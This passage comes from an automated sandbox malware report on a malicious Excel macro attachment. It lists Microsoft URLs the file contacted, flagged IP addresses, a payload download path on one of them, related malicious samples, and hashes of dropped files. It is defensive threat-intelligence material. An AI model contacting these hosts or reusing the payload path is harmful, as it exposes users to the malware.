                                                                                                    https://asgsmsproxyapi.azurewebsites.net/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.com/search/api/v2/initAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                  high
                                                                                                                  https://outlook.office365.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                    high
                                                                                                                    https://webshell.suite.office.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                      high
                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                        high
                                                                                                                        https://management.azure.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                          high
                                                                                                                          https://login.windows.net/common/oauth2/authorizeAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                            high
                                                                                                                            https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://graph.windows.net/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                              high
                                                                                                                              https://api.powerbi.com/beta/myorg/importsAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                high
                                                                                                                                https://devnull.onenote.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://ncus.pagecontentsync.AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://messaging.office.com/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v2AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/macAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.aiAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.comAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devicesAFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.AFFFA715-9DDB-47F5-B883-C762F5BE7936.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  185.234.247.7
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  198004INTERKONEKT-ASPLfalse
                                                                                                                                                  5.253.62.174
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  57724DDOS-GUARDRUfalse
                                                                                                                                                  185.117.73.74
                                                                                                                                                  unknownNetherlands
                                                                                                                                                  60117HSAEfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:440340
                                                                                                                                                  Start date:25.06.2021
                                                                                                                                                  Start time:08:31:56
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 39s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:Decline-172917164-06242021.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:28
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal76.troj.expl.evad.winXLSM@7/8@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 23.211.6.115, 52.109.76.68, 52.109.8.23, 20.50.102.62, 23.211.4.86, 205.185.216.42, 205.185.216.10, 173.222.108.226, 173.222.108.210, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
                                                                                                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  185.234.247.7Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    5.253.62.174Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                    • 5.253.62.174/44372.3504680556.dat
                                                                                                                                                    185.117.73.74Decline-172917164-06242021.xlsmGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      INTERKONEKT-ASPLDecline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.7
                                                                                                                                                      inquiry.06.21.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.9
                                                                                                                                                      inquiry.06.21.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.9
                                                                                                                                                      inquiry.06.21.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.9
                                                                                                                                                      trustScr.htaGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.14
                                                                                                                                                      aXgdOUvL9L.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.183
                                                                                                                                                      qH8pUgpOeA.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.244
                                                                                                                                                      UqdoQQIqio.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.244
                                                                                                                                                      29B9058449C81CF5AAA57316C620D80A48E2161D583C6.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.183
                                                                                                                                                      2fr18s8lrd.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.219
                                                                                                                                                      SecuriteInfo.com.W32.AIDetect.malware1.509.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.219
                                                                                                                                                      a1wnP3RcrY.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.219
                                                                                                                                                      Hs52qascx.dllGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.193
                                                                                                                                                      E2ucBaWqpe.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.233
                                                                                                                                                      malware.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.180
                                                                                                                                                      malware.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.180
                                                                                                                                                      yqwit.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.233
                                                                                                                                                      require,02.21.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.180
                                                                                                                                                      adjure.02.21.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.179
                                                                                                                                                      adjure.02.21.docGet hashmaliciousBrowse
                                                                                                                                                      • 185.234.247.179
                                                                                                                                                      DDOS-GUARDRUDecline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 5.253.62.174
                                                                                                                                                      ForceNitro.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.135
                                                                                                                                                      PO#8076.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.129.100.112
                                                                                                                                                      Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 185.240.103.162
                                                                                                                                                      Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 185.240.103.162
                                                                                                                                                      jebDtHCePK9feGL.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.129.100.112
                                                                                                                                                      EDS03932,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.160
                                                                                                                                                      PO_29_00412.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.160
                                                                                                                                                      PO_29_00412.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.160
                                                                                                                                                      12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.160
                                                                                                                                                      Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                                                                                                      • 5.253.61.31
                                                                                                                                                      AxR7BY4wzz.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.189
                                                                                                                                                      SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.189
                                                                                                                                                      #U041e#U0442#U043a#U0440#U044b#U0442#U044c www.sberbank.ru-0152 .htmGet hashmaliciousBrowse
                                                                                                                                                      • 185.129.100.100
                                                                                                                                                      Install.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.219.40.40
                                                                                                                                                      CHEAT.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.178.208.161
                                                                                                                                                      seed.exeGet hashmaliciousBrowse
                                                                                                                                                      • 185.219.40.40
                                                                                                                                                      DHL Document. PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 5.253.61.133
                                                                                                                                                      wrHgqtMUGL.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.128.207.237
                                                                                                                                                      1jjYj8IYOD.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.128.207.237

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AFFFA715-9DDB-47F5-B883-C762F5BE7936
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):135189
                                                                                                                                                      Entropy (8bit):5.363297740087895
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:McQIKNgeBTA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:eEQ9DQW+zvXO1
                                                                                                                                                      MD5:C48C08B643045EE4570B99E5A46DECD0
                                                                                                                                                      SHA1:D68C572D431A49B8C288146F36647E0A55C74D09
                                                                                                                                                      SHA-256:E77E0B2EFD28ECDBD213CF3A0618771F4763690C8EFCA9D0CDF888A7362BFEE1
                                                                                                                                                      SHA-512:E45E09CF0E607BC47B0F48C5AA4F87DCAB6856FA93668B7282E32354FB6A0E462AAD8085A95644B098E6579635BCE6D9C77DDD14551495D6E1F71204FC214A02
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-25T06:32:50">.. Build: 16.0.14223.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E0EC7632.tif
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:TIFF image data, little-endian, direntries=19, height=1600, bps=53710, compression=LZW, PhotometricIntepretation=RGB, width=1600
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):315878
                                                                                                                                                      Entropy (8bit):7.988901270632308
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:hRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZN3:hRMmEv2Bc/nvm8IKABfsYOmauFD
                                                                                                                                                      MD5:BB737290D394078D8A16D5509C5BC970
                                                                                                                                                      SHA1:C8A63B0AB1EB7745A0027E0A17A6CB4C6F79487E
                                                                                                                                                      SHA-256:E11121ECA3FAD55F66EA240EADD4F5B4C978828C94C34736F7673540529B17A5
                                                                                                                                                      SHA-512:3D8A6025171D283FA08D8A5BA4EAAD1EABAD55D7D34629F17F4C6601DD4438FB536B29D7B8CA71E540EDB782433118628EBD3A56CE8FFA453C6A45792425CB9A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                      Preview: II*..................h\*.......t2#...1..Z)....).~9&.H.r.,.C+.I....e-.M.Si..}0.K.SJ...3.Ng.ZL..G.S..:m..N.Tk5..Z.Z...+.~.f.X.v.-..k.Y.....m.].Wk...p.[.WL...s.^o.\M....c..<n/!..ds9..[)...-..9..h.z...C..i....e..m.[m..}..k.[N.....nw.^N....s..>o/.r.....C4U.kw{......f..~.W....y........y...'...;.R..<.[..;....o...T.....+......?p....N.....#........ht'...Q..E....CQ.^.\m.E......o.Ba[.#Dp...>.<c .1$.*.Q.E....Ir..+.....Y.(H..*K..{..Q...I.....R.Y(Fr|m<$.l...RL.&.3..GP0..D....=.s.5CT,.FN.==7Sq...Iu.3JQ.%GUKS..X...5V.Hu.Z..9T..O4...KC.5.N.Q..aD...g.V.Mh.m.c.M.eMSe.?V..UoR...j....<]...G.v.B$v\Iv[.].f...N\...y_...M....p`w..b.6%.a......T3.c..S.WQ...S......tHk[7.[4;..k.#....~e...f.m.&...-.iz6....V5.jzN...:.3.k.......M..[......m[N...~.nz~.o...k....;.........y..{`.......u..|?-.q.f...|...m6...b..#..]'5..<...g.7_........q.u..].....$[.....~...+..I.p.zt.Y.N.}.............FS5.....k..H...#....~.w.....:...?........"..... 4..PB.A....l...j...... .p..BX1..D..0..Bx
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\7E810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):328824
                                                                                                                                                      Entropy (8bit):7.982621797622554
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:EVRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZNd:EVRMmEv2Bc/nvm8IKABfsYOmauFZ
                                                                                                                                                      MD5:E06B069F97185EB2B8C746C9DB74E4F8
                                                                                                                                                      SHA1:73E1E88179D050DE901D144605A6AF19D8ACB475
                                                                                                                                                      SHA-256:38A4838C09691DB570EC5E070EE3F84DEA61F84F7E60063CBFD5C2025B1EED0F
                                                                                                                                                      SHA-512:BE396FC23367C37ABC4D741317018874DB1273380AC73949FDCB6DC7A6C4CC1BAE8E9BCBB41C6E5E07C214C0130608E67EDE5252479715BFF1C44A8E50BB63D0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.n.0....?..........C....I?`L.,..@N...;....l+........pz.r.z.M.j&.B..6~._.../...^...[..,nf.?L...s.h.[...Rf.....g...........@y=.|.*xBO5..1.~...,Uw+..8../...wE....5....g....B..c.&..s.H.61.VL.H....{5..|..6U...X.M.8...2s8.a.....RM...O^.d4V....8..\Y...r..9.[..r.+...J.8P).y.[.90.5......p.z......,I......S...A....?.%.o.......hF.gZ[..N.!.S.!.~ ......{.N.R,....u....*...x...x..s[.O!f...O7..&...L.......S..vb,.F.G[....7.......PK..........!...Wm............[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Decline-172917164-06242021.xlsm.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Fri Jun 25 14:32:53 2021, atime=Fri Jun 25 14:32:53 2021, length=328814, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2280
                                                                                                                                                      Entropy (8bit):4.657356996623739
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:8FcEbQ5U582zrlqBB6pFcEbQ5U582zrlqBB6:8FbQetqBKFbQetqB
                                                                                                                                                      MD5:93AADBF69E50443D8098783286ECB796
                                                                                                                                                      SHA1:EB0DC333C9274FFE6966106F7E0D6AF781D00949
                                                                                                                                                      SHA-256:FB50E9E98FBC87F83AF9A2563C4E7D2071C3E51DD773A42B3574510371B41D20
                                                                                                                                                      SHA-512:5AB6BF22C2EB5859DA412128B68AA8012727EE709175E959823FAEA97259D08557FC05E5775AAA0AE5D503599928351BE7136EEBC4D7F21B671CD66D225229AC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...2G..:...].D].i..].D].i..n............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.|....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.|.....S....................d...h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny..R.|.....Y..............>......v..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.R....R.| .DECLIN~1.XLS..p......>Qvx.R.|....h......................0G.D.e.c.l.i.n.e.-.1.7.2.9.1.7.1.6.4.-.0.6.2.4.2.0.2.1...x.l.s.m.......e...............-.......d...........>.S......C:\Users\user\Desktop\Decline-172917164-06242021.xlsm..6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.e.c.l.i.n.e.-.1.7.2.9.1.7.1.6.4.-.0.6.2.4.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......701188...........!a..%.H.VZAj...D..-.........-..!a..%.H.VZAj...D..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jun 25 14:32:53 2021, atime=Fri Jun 25 14:32:53 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.652463570923881
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8zhNcXUBquElPCH2A83nM/1iYlsa35X+WrjAZ/2bDzUNlLLC5Lu4t2Y+xIBjKZm:8PZ83MtN3fAZiDYly87aB6m
                                                                                                                                                      MD5:95B38068C3096DF42DEA3DDD5E74F256
                                                                                                                                                      SHA1:D1F51757BAE0399AA261270D4E91862A7326E61C
                                                                                                                                                      SHA-256:EACA3374451321BB6581CC48C549B345A69659E5952E03D789B45067CF39C7C8
                                                                                                                                                      SHA-512:5B2B80FB38B4579249045A3D5C43242BBA361D581E135A0E357D37F6CEF44F942F7D312992407D1AB9AAA0E893256133016909EA19FB971E59783B66C29E0369
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-....@].i..3.=].i... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...R.|....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..R.|.....S....................d...h.a.r.d.z.....~.1......R.|..Desktop.h.......Ny..R.|.....Y..............>.....{.h.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......701188...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):148
                                                                                                                                                      Entropy (8bit):4.670715974822165
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomxWqGLtgLZbRF+lpS51MLtgLZbRF+lpSmxWqGLtgLZbRF+lpSv:djnLl6pQJLl6pJLl6pc
                                                                                                                                                      MD5:18DE3666D6ACE54894732FA90CE82F20
                                                                                                                                                      SHA1:40E91CA0E4EAF463C0AA1C70DAB4F9CF3B5C2857
                                                                                                                                                      SHA-256:FFDFC43F6748B957BC846E246A31CF7AC64A1B218EEB1139EBB4C405C230A34F
                                                                                                                                                      SHA-512:6C306B211720C7FCA2DB120DD28E12593037F4DAF0B1142A11217A276CE4F9573B86016FB816DDAEE72657C5C474FD6C25A9F70D959DB82CD95931F9FBCE248B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[misc]..Decline-172917164-06242021.xlsm.LNK=0..Decline-172917164-06242021.xlsm.LNK=0..[misc]..Decline-172917164-06242021.xlsm.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\1F810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):328814
                                                                                                                                                      Entropy (8bit):7.982657838641852
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:EvTRMlgE+mJ9ABc/nv5k8IKAhBfsOwmLgzLc1pTcsGEdDIPmhsB0vRakfzeQZND:ELRMmEv2Bc/nvm8IKABfsYOmauFP
                                                                                                                                                      MD5:2C6531C8E720B22846D7464B88A26267
                                                                                                                                                      SHA1:968580613C2B523E2F572DC14E9ECD16A3A43887
                                                                                                                                                      SHA-256:D1FC2D573763716284713955E8787915F048AC5E77D4A7165FFF7865867DA244
                                                                                                                                                      SHA-512:43C201FED5AB06D99E472FF8190A005AE8A82018D8E3C9609117D0A59C6E66674CED21511A4965D4CE418D48A2293210DA1CE537848B70A003D39B9E3B3E3FA6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
